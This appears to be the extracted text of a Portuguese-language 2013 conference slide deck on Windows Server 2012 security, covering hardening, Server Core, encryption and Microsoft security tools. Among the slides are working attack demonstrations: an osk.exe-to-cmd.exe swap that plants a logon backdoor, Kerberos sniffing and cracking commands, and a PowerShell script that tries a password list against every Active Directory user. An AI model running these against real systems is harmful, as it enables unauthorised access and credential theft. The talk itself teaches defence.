Windows Server

Hacking Windows Systems
Ataques e Defesas
Hacking Day 2013
Princípios de segurança e
novidades do Windows Server 2012
DANIEL DONDA
MVP Windows Expert-IT Pro
MCP,MCT,MCITP-EA, MCSA+Security, MCSE+Security, MCSE+Messaging
EC-CEH V8 | EC-CEI
www.mcsesolution.com | www.infosecbrasil.org
twitter: @danieldonda
http://mvp.microsoft.com/pt-br/
1
Agenda
• Apresentação
• Segurança e Microsoft – Uma analise através do tempo
• Porque é fácil atacar o Windows ?
• O Windows sem Windows (Reduzindo a superfície de ataque)
• Hardening Windows Server 2012
• Kerbsniff, KerbCrack e o Kerberos Armoring
• 10 importantes recursos e dicas MSFT
2
Metas para a sessão de hoje
Princípios de segurança e novidades
3
Segurança e Microsoft – Uma
analise através do tempo
Windows History
•
•
•
•
•
•
•
•
•
•
•
1975–1981: Microsoft inicia.
1981 – MS-DOS
1982–1985: Windows 1.0
1987–1992: Windows 2.0–2.11
1990–1994: Windows 3.0–Windows NT
1995–2001: Windows 95
1998–2000: Windows 98, Windows 2000, Windows Me - Internet
2001–2005: Windows XP - Consciência de vírus de computador e hackers
2006–2008: Windows Vista – 1,5 milhões de dispositivos são compatíveis
2009: Windows 7 - 8 Milhões de beta-testers no mundo
2012: Windows 8 – Recursos avançados de segurança
5
Porque é fácil atacar o
Windows ?
6
Atacando o Windows
1 – Usuário / Admin (60.000.000)
2 – Softwares desnecessários
3 – Configuração Incorreta
4 – Softwares desatualizados
5 – OS desatualizado
5 – Falta de conhecimento
7
1 - Elevação de privilégio
CD\Windows\System32\
COPY OSK.EXE OSK.OLD2
takeown /F osk.exe
cacls osk.exe /G Administrator:F /E
COPY CMD.EXE OSK.EXE
8
2 - Kerberos Atack vs Kerberos Armoring
Kerbsniff kerbs.txt
KerbCrack kerbs.txt –d kgodoi
http://ntsecurity.nu/toolbox/kerbcrack/
RFC 6113 - Flexible Authentication Secure Tunnel (FAST)
3- Proteção de acesso a dados – SMB 3.0
01001010110111011101010111011101011011
net use x: \\servidor\dados
x:
type senhas.txt
Servidor
SMB 3 utiliza um novo algoritmo para assinatura - AES-CMAC em vez do HMAC-SHA256
usado por SMB 2.
10
Proteção de acesso a dados - DAC
• Dynamic Access Control
• Controlar quem pode acessar informação e auditar quem teve
acesso a informação.
• Classificar arquivos para toda a corporação.
•
Auditar o acesso a arquivos usando as diretivas de auditoria centrais para
• geração de relatórios de conformidade e análise forense.
• Aplicar proteção Rights Management Services (RMS)
11
O Windows sem Windows
Reduzindo a superfície de
ataque
12
Windows Server Core





Menos uso de recursos
Menos serviços e recursos
Menos reboot
Redução de Updates em até 70%
Menos superfície de ataque
13
Recursos do Server Core













Active Directory Certificate Services
Active Directory Domain Services
DHCP Server
DNS Server
File Services (including File Server Resource Manager)
Active Directory Lightweight Directory Services (AD LDS)
Hyper-V
Print and Document Services
Streaming Media Services
Web Server (including a subset of ASP.NET)
Windows Server Update Server
Active Directory Rights Management Server
Routing and Remote Access Server
14
Opções do Server Core
disponível
disponível
disponível
Windows PowerShell / Windows disponíveis
.NET
disponíveis
Gerenciador do Servidor
não disponível
disponível
Console de Gerenciamento
Microsoft
não disponível
disponível
Painel de Controle
não disponível
não disponível
Miniaplicativos do Painel de
Controle
não disponíveis
alguns disponíveis
Windows Explorer
não disponível
não disponível
disponível
Barra de tarefas
não disponível
não disponível
disponível
Área de notificação
não disponível
não disponível
disponível
Internet Explorer
não disponível
não disponível
disponível
Sistema de ajuda integrado
não disponível
não disponível
disponível
Temas
não disponíveis
não disponíveis
não disponíveis
disponíveis
tela Iniciar estilo Metro
não disponível
não disponível
não disponível
disponível
Aplicativos estilo Metro
não disponíveis
não disponíveis
não disponíveis
disponíveis
Windows Media Player
não disponível
não disponível
não disponível
disponível
15
disponíveis
Recurso Experiência Desktop instalado
disponível
disponível
disponível
disponíveis
disponíveis
disponível
disponível
disponível
disponíveis
disponível
disponível
disponível
disponível
disponível
Server-Gui-Mgmt-Infra, Server-Gui-Shell, Desktop-Experience
disponível
Opção de instalação Servidor com GUI
Server-Gui-Mgmt-Infra, Server-Gui-Shell
Prompt de comando
Interface Mínima do Servidor
Server-Gui-Mgmt-Infra
Opção de instalação do Server Core
O que é o Microsoft Hyper-V Server?
Microsoft hypervisor
• Command Line Interface
• Não possui licença de SO
• Standalone Hyper-V
• Download gratuito do ISO
• Gerenciamento Remoto
16
Hardening Windows Server
2012
17
Features on Demand
• PowerShell
• DISM
18
Security Configuration Wizard
19
Password Settings Object
20
10 importantes recursos e dicas
da MSFT
21
1-Microsoft Security Intelligence Report
O Microsoft Security Intelligence Report (SIR) é um relatório
trimestral sobre vulnerabilidades de software, exploração de
vulnerabilidades de software e softwares maliciosos e
potencialmente indesejados.
www.microsoft.com/sir
22
2 - Microsoft Security Response Center
• O Microsoft Security Response Center (MSRC) identifica,
monitora, resolve, e responde a incidentes de segurança e
vulnerabilidades de segurança de software Microsoft.
• Estamos em 24 horas de alerta de segurança todos os dias,
grupos de notícias de segurança, monitorar e responder a
mais de 100.000 e-mails de clientes anualmente enviados
para [email protected].
http://www.microsoft.com/security/msrc/default.aspx
23
3 - Microsoft Security Compliance Manager
• O SCM é uma ferramenta gratuita da Microsoft que permite
configurar rapidamente e gerenciar os computadores em seu
ambiente com Diretiva de Grupo e Microsoft System Center
Configuration Manager.
• SCM fornece prontos para implantar políticas e pacotes de
configuração baseadas em recomendações da guia de segurança e
melhores práticas da indústria, permitindo que você gerencie
facilmente configurações e requisitos de conformidade para os
sistemas operacionais Windows.
http://technet.microsoft.com/en-us/library/cc677002.aspx
24
4 – Proteção com criptografia
• BitLocker e Bitlocker to go
• BitLocker utiliza o Advanced Encryption Standard, com 128-bit e 256-bit
comprimentos de chave.
• EFS (Encrypting File System)
• Criptografia de arquivos usando algoritmos RSA
ou ECC
25
5 - Freeware Microsoft Tools
•
•
•
•
•
•
•
•
•
•
•
•
AccessChk- Essa ferramenta mostra a você os acessos de usuário ou de grupo a arquivos, a chaves do Registro ou serviços
AccessEnum - Essa ferramenta de segurança simples, mostra a você quem tem que tipo de acesso a diretórios.
Sigcheck - informações sobre a versão do arquivo e verifique se as imagens em seu sistema estão assinadas digitalmente.
ShareEnum - Verifique compartilhamentos de arquivos e exiba suas configurações de segurança
SDelete - Substitua com segurança seus arquivos confidenciais e libere espaço livre de arquivos excluídos.
Account Lockout and Management Tools – Uso muito, principalmente o acctinfo.dll para exibir outros atributos no AD.
PortQry Command Line Port Scanner Analise de estado das portas TCP e UDP
Port Reporter – Quais portas que são usadas, qual o processo está usando a porta, se o processo é um serviço
Port Reporter Parser Tool - Analisador de log para arquivos de log Port Reporter.
Promqry and PromqryUI Detecta Sniffers Promiscuos
PromqryUI Interface grafica para promqey.
Promqry linha de comando para detecção de sniffers no modo promiscuous.
Windows SteadyState – Não importa o que aconteça – Vírus, Malware – você pode voltar o seu Windows ao normal
http://www.mcsesolution.com/Mcsesolution/lista-de-softwares-freewaremicrosoft-tools.html
26
6 - Windows 8 contra Malware
Windows 8 inclui as seguintes tecnologias novas e avançadas
que proporcionam melhor defesa contra malware:
• Action Center
• Secure Boot
• User Account Control (UAC)
• Biometric Security
• Windows Defender
• Malicious Software Removal Tool
• Windows Firewall
27
7 - O Windows To Go
• O Windows To Go é uma imagem de boot do Windows 8 em
um drive USB que um usuário pode iniciar em outro
computador. Windows to go fornece aos usuários uma cópia
portátil de um computador Windows corporativo para
fornecer uma experiência de usuário consistente em certos
tipos de hotdesk ou remotos cenários de trabalho.
28
8 - PowerShell
• ~2,430 cmdlets
dsquery user -limit 0 > users
foreach ($FDN in Get-Content .\users
{
$results =dsget user $FDN -samid
$samid = $results[1].replace (" ","")
Write-host $samid
foreach ($password in Get-Content .\password.txt
{
$password = $password.replace(" "."")
dsget user $FDN -u $samid -p $password > $null
if ($?) {
Write-host "Conta: $samid Senha: $password"
}
}
}
http://bit.ly/WinPS-Ebook
29
9 - Newsletter de Segurança
•
•
•
•
•
•
•
•
•
•
•
Dicas de segurança
Notícias da comunidade e outras informações de segurança relevantes
Biografias dos MVPs (Profissionais Mais Valiosos) de segurança
Guias, recursos e práticas recomendadas de segurança
Blogs, fóruns, grupos de notícias e sites de segurança
Informações sobre o ciclo de vida dos produtos da Microsoft
Boletins e atualizações de segurança
Editoriais de executivos e especialistas em segurança da Microsoft
Webcasts e chats
Eventos sobre segurança online e presenciais
Laboratórios práticos de segurança da Microsoft
http://technet.microsoft.com/pt-br/security/
30
10 - Microsoft Security on Twitter
· @Safer_Online, http://twitter.com/Safer_Online
· @MSFTSecResponse, http://twitter.com/msftsecresponse
· @MSFTSecurity, http://twitter.com!/msftsecurity
· @MSFTmmpc, http://twitter.com/msftmmpc
· @MicrosoftDCU, http://twitter.com!/MicrosoftDCU
• Microsoft Security on Facebook
• · MMPC - http://www.facebook.com/#!/msftmmpc
31
Thank You!
Thank you for your time and attention!
http://facebook.com/mcsesolution
@danieldonda
32